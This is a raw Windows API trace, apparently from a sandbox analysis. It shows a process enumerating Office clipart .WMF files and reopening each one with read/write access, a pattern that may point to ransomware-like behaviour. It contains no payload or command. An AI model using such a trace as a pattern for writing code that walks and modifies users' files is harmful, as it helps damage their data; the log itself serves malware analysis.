[0103.301] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 69 [0103.301] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00200_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6d2045, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6d2045, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc20)) returned 1 [0103.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0103.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0103.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0103.301] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.301] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.301] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6d2045, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6d2045, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x634, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS00224_.WMF", cAlternateFileName="")) returned 1 [0103.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0103.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0103.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0103.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0103.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0103.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0103.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0103.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0103.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0103.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0103.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0103.302] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.302] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.302] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.302] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0103.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.302] AreFileApisANSI () returned 1 [0103.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0103.302] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.302] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0103.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0103.303] AreFileApisANSI () returned 1 [0103.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0103.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 69 [0103.303] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00224_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.303] GetFileType (hFile=0x33c) returned 0x1 [0103.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0103.303] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.303] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.304] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.304] CloseHandle (hObject=0x33c) returned 1 [0103.304] AreFileApisANSI () returned 1 [0103.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0103.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 69 [0103.304] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00224_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.304] GetFileType (hFile=0x33c) returned 0x1 [0103.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0103.304] CloseHandle (hObject=0x33c) returned 1 [0103.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0103.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0103.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0103.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0103.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0103.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0103.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0103.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0103.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.306] AreFileApisANSI () returned 1 [0103.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0103.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 69 [0103.306] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00224_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6d2045, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6d2045, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x634)) returned 1 [0103.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0103.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0103.306] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.306] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.306] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6d2045, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6d2045, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6d2045, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4bc, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS00438_.WMF", cAlternateFileName="")) returned 1 [0103.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0103.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0103.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0103.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0103.307] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.307] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0103.307] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.307] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0103.307] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.307] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0103.307] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.307] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x603f8 [0103.307] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0103.307] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.307] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0103.307] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x603f8 | out: hHeap=0x20000) returned 1 [0103.307] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.307] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.307] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.307] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.307] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0103.307] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.307] AreFileApisANSI () returned 1 [0103.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.307] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0103.307] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.307] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.307] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0103.307] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0103.307] AreFileApisANSI () returned 1 [0103.307] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.307] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ab20 [0103.308] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8ab20, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 69 [0103.308] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00438_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.308] GetFileType (hFile=0x33c) returned 0x1 [0103.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0103.309] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.309] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.309] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.309] CloseHandle (hObject=0x33c) returned 1 [0103.309] AreFileApisANSI () returned 1 [0103.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8afe0 [0103.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8afe0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 69 [0103.309] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00438_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.310] GetFileType (hFile=0x33c) returned 0x1 [0103.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0103.310] CloseHandle (hObject=0x33c) returned 1 [0103.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.310] AreFileApisANSI () returned 1 [0103.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.310] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00438_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6d2045, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6d2045, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6d2045, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4bc)) returned 1 [0103.310] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.310] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.310] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6d2045, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x804, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS00439_.WMF", cAlternateFileName="")) returned 1 [0103.310] 